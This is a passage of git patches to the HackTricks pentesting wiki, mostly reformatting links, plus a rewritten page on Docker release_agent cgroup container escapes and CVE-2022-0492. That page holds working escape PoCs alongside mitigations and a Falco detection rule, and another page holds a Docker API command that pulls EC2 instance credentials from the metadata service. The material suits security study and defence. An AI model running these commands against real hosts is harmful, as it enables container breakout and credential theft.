+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 
 
 ### Other Interesting functions
 
@@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
 
-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 
 
 ### .mdb Password Cracker
 

From 9e75f989369d62e30ac10407d33a2e3617e32e7c Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 12 Jul 2025 11:05:14 +0000
Subject: [PATCH 4/6] Add content from: Research Update: Enhanced
 src/linux-hardening/privilege-esca...

---
 .../discord-invite-hijacking.md               |   4 +-
 .../docker-release_agent-cgroups-escape.md    | 147 +++++++++++++-----
 .../1099-pentesting-java-rmi.md               |  11 +-
 .../2375-pentesting-docker.md                 |   3 +-
 .../pentesting-web/joomla.md                  |   3 +-
 .../pentesting-web/moodle.md                  |   4 +-
 src/pentesting-web/file-upload/README.md      |   2 +-
 .../low-power-wide-area-network.md            |   4 +-
 8 files changed, 119 insertions(+), 59 deletions(-)

diff --git a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
index a7b5f902f..42cfcb0eb 100644
--- a/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md
@@ -57,7 +57,7 @@ This approach avoids direct file downloads and leverages familiar UI elements to
 
 ## References
 
-- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/
-- Discord Custom Invite Link Documentation – https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link
+- From Trust to Threat: Hijacked Discord Invites Used for Multi-Stage Malware Delivery – [https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/](https://research.checkpoint.com/2025/from-trust-to-threat-hijacked-discord-invites-used-for-multi-stage-malware-delivery/)
+- Discord Custom Invite Link Documentation – [https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link](https://support.discord.com/hc/en-us/articles/115001542132-Custom-Invite-Link)
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index c6241162e..127402912 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -4,7 +4,9 @@
 
 **For further details, refer to the** [**original blog post**](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)**.** This is just a summary:
 
-Original PoC:
+---
+
+## Classic PoC (2019)
 
 ```shell
 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
@@ -14,51 +16,112 @@ touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
 $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
 ```
 
-The proof of concept (PoC) demonstrates a method to exploit cgroups by creating a `release_agent` file and triggering its invocation to execute arbitrary commands on the container host. Here's a breakdown of the steps involved:
+The PoC abuses the **cgroup-v1** `release_agent` feature: when the last task of a cgroup that has `notify_on_release=1` exits, the kernel (in the **initial namespaces on the host**) executes the program whose pathname is stored in the writable file `release_agent`.  Because that execution happens with **full root privileges on the host**, gaining write access to the file is enough for a container escape.
 
-1. **Prepare the Environment:**
-   - A directory `/tmp/cgrp` is created to serve as a mount point for the cgroup.
-   - The RDMA cgroup controller is mounted to this directory. In case of absence of the RDMA controller, it's suggested to use the `memory` cgroup controller as an alternative.
+### Short, readable walk-through
 
-```shell
-mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
+1. **Prepare a new cgroup**
+
+   ```shell
+   mkdir /tmp/cgrp
+   mount -t cgroup -o rdma cgroup /tmp/cgrp   # or –o memory
+   mkdir /tmp/cgrp/x
+   echo 1 > /tmp/cgrp/x/notify_on_release
+   ```
+
+2. **Point `release_agent` to attacker-controlled script on the host**
+
+   ```shell
+   host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
+   echo "$host_path/cmd" > /tmp/cgrp/release_agent
+   ```
+
+3. **Drop the payload**
+
+   ```shell
+   cat <<'EOF' > /cmd
+#!/bin/sh
+ps aux > "$host_path/output"
+EOF
+   chmod +x /cmd
+   ```
+
+4. **Trigger the notifier**
+
+   ```shell
+   sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs"   # add ourselves and immediately exit
+   cat /output                                  # now contains host processes
+   ```
+
+---
+
+## 2022 kernel vulnerability – CVE-2022-0492
+
+In February 2022 Yiqi Sun and Kevin Wang discovered that **the kernel did *not* verify capabilities when a process wrote to `release_agent` in cgroup-v1** (function `cgroup_release_agent_write`).
+
+Effectively **any process that could mount a cgroup hierarchy (e.g. via `unshare -UrC`) could write an arbitrary path to `release_agent` without `CAP_SYS_ADMIN` in the *initial* user namespace**.  On a default-configured, root-running Docker/Kubernetes container this allowed:
+
+* privilege escalation to root on the host; ↗
+* container escape without the container being privileged.
+
+The flaw was assigned **CVE-2022-0492** (CVSS 7.8 / High) and fixed in the following kernel releases (and all later):
+
+* 5.16.2, 5.15.17, 5.10.93, 5.4.176, 4.19.228, 4.14.265, 4.9.299.
+
+Patch commit: `1e85af15da28 "cgroup: Fix permission checking"`.
+
+### Minimal exploit inside a container
+
+```bash
+# prerequisites: container is run as root, no seccomp/AppArmor profile, cgroup-v1 rw inside
+apk add --no-cache util-linux  # provides unshare
+unshare -UrCm sh -c '
+  mkdir /tmp/c; mount -t cgroup -o memory none /tmp/c;
+  echo 1 > /tmp/c/notify_on_release;
+  echo /proc/self/exe > /tmp/c/release_agent;     # will exec /bin/busybox from host
+  (sleep 1; echo 0 > /tmp/c/cgroup.procs) &
+  while true; do sleep 1; done
+'
+```
+If the kernel is vulnerable the busybox binary from the *host* executes with full root.
+
+### Hardening & Mitigations
+
+* **Update the kernel** (≥ versions above).  The patch now requires `CAP_SYS_ADMIN` in the *initial* user namespace to write to `release_agent`.
+* **Prefer cgroup-v2** – the unified hierarchy **removed the `release_agent` feature completely**, eliminating this class of escapes.
+* **Disable unprivileged user namespaces** on hosts that do not need them:
+  ```shell
+  sysctl -w kernel.unprivileged_userns_clone=0
+  ```
+* **Mandatory access control**: AppArmor/SELinux policies that deny `mount`, `openat` on `/sys/fs/cgroup/**/release_agent`, or drop `CAP_SYS_ADMIN`, stop the technique even on vulnerable kernels.
+* **Read-only bind-mask** all `release_agent` files (Palo Alto script example):
+  ```shell
+  for f in $(find /sys/fs/cgroup -name release_agent); do
+      mount --bind -o ro /dev/null "$f"
+  done
+  ```
+
+## Detection at runtime
+
+[`Falco`](https://falco.org/) ships a built-in rule since v0.32:
+
+```yaml
+- rule: Detect release_agent File Container Escapes
+  desc: Detect an attempt to exploit a container escape using release_agent
+  condition: open_write and container and fd.name endswith release_agent and
+             (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and
+             thread.cap_effective contains CAP_SYS_ADMIN
+  output: "Potential release_agent container escape (file=%fd.name user=%user.name cap=%thread.cap_effective)"
+  priority: CRITICAL
+  tags: [container, privilege_escalation]
 ```
 
-2. **Set Up the Child Cgroup:**
-   - A child cgroup named "x" is created within the mounted cgroup directory.
-   - Notifications are enabled for the "x" cgroup by writing 1 to its notify_on_release file.
-
-```shell
-echo 1 > /tmp/cgrp/x/notify_on_release
-```
-
-3. **Configure the Release Agent:**
-   - The path of the container on the host is obtained from the /etc/mtab file.
-   - The release_agent file of the cgroup is then configured to execute a script named /cmd located at the acquired host path.
-
-```shell
-host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
-echo "$host_path/cmd" > /tmp/cgrp/release_agent
-```
-
-4. **Create and Configure the /cmd Script:**
-   - The /cmd script is created inside the container and is configured to execute ps aux, redirecting the output to a file named /output in the container. The full path of /output on the host is specified.
-
-```shell
-echo '#!/bin/sh' > /cmd
-echo "ps aux > $host_path/output" >> /cmd
-chmod a+x /cmd
-```
-
-5. **Trigger the Attack:**
-   - A process is initiated within the "x" child cgroup and is immediately terminated.
-   - This triggers the `release_agent` (the /cmd script), which executes ps aux on the host and writes the output to /output within the container.
-
-```shell
-sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
-```
-
-{{#include ../../../../banners/hacktricks-training.md}}
+The rule triggers on any write attempt to `*/release_agent` from a process inside a container that still wields `CAP_SYS_ADMIN`.
 
 
+## References
 
+* [Unit 42 – CVE-2022-0492: container escape via cgroups](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) – detailed analysis and mitigation script.
+* [Sysdig Falco rule & detection guide](https://sysdig.com/blog/detecting-mitigating-cve-2022-0492-sysdig/)
+
+{{#include ../../../../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md
index 5783a81f2..77e552d4e 100644
--- a/src/network-services-pentesting/1099-pentesting-java-rmi.md
+++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md
@@ -86,7 +86,7 @@ $ rmg enum 172.17.0.2 9010
 [+]
 [+] RMI server codebase enumeration:
 [+]
-[+] 	- http://iinsecure.dev/well-hidden-development-folder/
+[+] 	- [http://iinsecure.dev/well-hidden-development-folder/](http://iinsecure.dev/well-hidden-development-folder/)
 [+] 		--> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub
 [+] 		--> de.qtc.rmg.server.interfaces.IPlainServer
 [+]
@@ -254,8 +254,8 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
 [+] 	- javax.management.remote.rmi.RMIConnection newClient(Object params)
 [+]
 [+] References:
-[+] 	- https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html
-[+] 	- https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi
+[+] 	- [https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html](https://docs.oracle.com/javase/8/docs/technotes/guides/management/agent.html)
+[+] 	- [https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi](https://github.com/openjdk/jdk/tree/master/src/java.management.rmi/share/classes/javax/management/remote/rmi)
 [+]
 [+] Vulnerabilities:
 [+]
@@ -269,7 +269,7 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
 [+] 		is therefore most of the time equivalent to remote code execution.
 [+]
 [+] 	References:
-[+] 		- https://github.com/qtc-de/beanshooter
+[+] 		- [https://github.com/qtc-de/beanshooter](https://github.com/qtc-de/beanshooter)
 [+]
 [+] 	-----------------------------------
 [+] 	Name:
@@ -282,7 +282,7 @@ $ rmg known javax.management.remote.rmi.RMIServerImpl_Stub
 [+] 		establish a working JMX connection, you can also perform deserialization attacks.
 [+]
 [+] 	References:
-[+] 		- https://github.com/qtc-de/beanshooter
+[+] 		- [https://github.com/qtc-de/beanshooter](https://github.com/qtc-de/beanshooter)
 ```
 
 ## Shodan
@@ -316,4 +316,3 @@ Entry_1:
 {{#include ../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md
index e3726df27..f0b90992f 100644
--- a/src/network-services-pentesting/2375-pentesting-docker.md
+++ b/src/network-services-pentesting/2375-pentesting-docker.md
@@ -163,7 +163,7 @@ curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
 #List processes inside a container
 curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
 #Set up and exec job to hit the metadata URL
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'](http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}')
 #Get the output
 curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
 # list secrets (no secrets/swarm not set up)
@@ -337,4 +337,3 @@ You can use auditd to monitor docker.
 {{#include ../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/network-services-pentesting/pentesting-web/joomla.md b/src/network-services-pentesting/pentesting-web/joomla.md
index 8ae5dcf83..efda84aa8 100644
--- a/src/network-services-pentesting/pentesting-web/joomla.md
+++ b/src/network-services-pentesting/pentesting-web/joomla.md
@@ -65,7 +65,7 @@ curl https://www.joomla.org/ | grep Joomla | grep generator
 1- What is this?
 	* This is a Joomla! installation/upgrade package to version 3.x
 	* Joomla! Official site: https://www.joomla.org
-	* Joomla! 3.9 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history
+	* Joomla! 3.9 version history - [https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history](https://docs.joomla.org/Special:MyLanguage/Joomla_3.9_version_history)
 	* Detailed changes in the Changelog: https://github.com/joomla/joomla-cms/commits/staging
 ```
 
@@ -124,4 +124,3 @@ If you managed to get **admin credentials** you can **RCE inside of it** by addi
 {{#include ../../banners/hacktricks-training.md}}
 
 
-
diff --git a/src/network-services-pentesting/pentesting-web/moodle.md b/src/network-services-pentesting/pentesting-web/moodle.md
index ac6bf5f4f..8375e6ce5 100644
--- a/src/network-services-pentesting/pentesting-web/moodle.md
+++ b/src/network-services-pentesting/pentesting-web/moodle.md
@@ -21,8 +21,8 @@ droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
     3.10.0-beta
 
 [+] Possible interesting urls found:
-    Static readme file. - http://moodle.schooled.htb/moodle/README.txt
-    Admin panel - http://moodle.schooled.htb/moodle/login/
+Static readme file. - [http://moodle.schooled.htb/moodle/README.txt](http://moodle.schooled.htb/moodle/README.txt)
+Admin panel - [http://moodle.schooled.htb/moodle/login/](http://moodle.schooled.htb/moodle/login/)
 
 [+] Scan finished (0:00:05.643539 elapsed)
 ```
diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index 0b63f0a41..beb5e87ee 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -149,7 +149,7 @@ wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
 The name is too long, 240 chars total.
 Trying to shorten...
 New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
---2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
+--2020-06-13 03:14:06--  [http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif](http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif)
 Connecting to 127.0.0.1:9080... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 10 [image/gif]
diff --git a/src/todo/radio-hacking/low-power-wide-area-network.md b/src/todo/radio-hacking/low-power-wide-area-network.md
index e33e95c62..1ec25f70d 100644
--- a/src/todo/radio-hacking/low-power-wide-area-network.md
+++ b/src/todo/radio-hacking/low-power-wide-area-network.md
@@ -94,6 +94,6 @@ Force SF12/125 kHz to increase airtime → exhaust duty-cycle of gateway (denial
 
 ## References
 
-* LoRaWAN Auditing Framework (LAF) – https://github.com/IOActive/laf
-* Trend Micro LoRaPWN overview – https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a
+* LoRaWAN Auditing Framework (LAF) – [https://github.com/IOActive/laf](https://github.com/IOActive/laf)
+* Trend Micro LoRaPWN overview – [https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a](https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a)
 {{#include ../../banners/hacktricks-training.md}}

From 9311653d7a2b592ed3b5461f88099f2db00c9b95 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Sat, 12 Jul 2025 17:15:03 +0200
Subject: [PATCH 5/6] Update 2375-pentesting-docker.md

---
 src/network-services-pentesting/2375-pentesting-docker.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md
index f0b90992f..99db0ebee 100644
--- a/src/network-services-pentesting/2375-pentesting-docker.md
+++ b/src/network-services-pentesting/2375-pentesting-docker.md
@@ -163,7 +163,7 @@ curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq
 #List processes inside a container
 curl –insecure https://tlsopen.docker.socket:2376/containers/f9cecac404b01a67e38c6b4111050c86bbb53d375f9cca38fa73ec28cc92c668/top | jq
 #Set up and exec job to hit the metadata URL
-curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}'](http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}')
+curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/containers/blissful_engelbart/exec -d '{ "AttachStdin": false, "AttachStdout": true, "AttachStderr": true, "Cmd": ["/bin/sh", "-c", "wget -qO- [http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"]}']
 #Get the output
 curl –insecure -X POST -H "Content-Type: application/json" https://tlsopen.docker.socket:2376/exec/4353567ff39966c4d231e936ffe612dbb06e1b7dd68a676ae1f0a9c9c0662d55/start -d '{}'
 # list secrets (no secrets/swarm not set up)

From 9cd3de87119761528b7170768581970d2b405b81 Mon Sep 17 00:00:00 2001
From: SirBroccoli <carlospolop@gmail.com>
Date: Sat, 12 Jul 2025 17:18:04 +0200
Subject: [PATCH 6/6] Update README.md

---
 src/pentesting-web/file-upload/README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/pentesting-web/file-upload/README.md b/src/pentesting-web/file-upload/README.md
index beb5e87ee..0b63f0a41 100644
--- a/src/pentesting-web/file-upload/README.md
+++ b/src/pentesting-web/file-upload/README.md
@@ -149,7 +149,7 @@ wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")')
 The name is too long, 240 chars total.
 Trying to shorten...
 New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.
---2020-06-13 03:14:06--  [http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif](http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif)
+--2020-06-13 03:14:06--  http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif
 Connecting to 127.0.0.1:9080... connected.
 HTTP request sent, awaiting response... 200 OK
 Length: 10 [image/gif]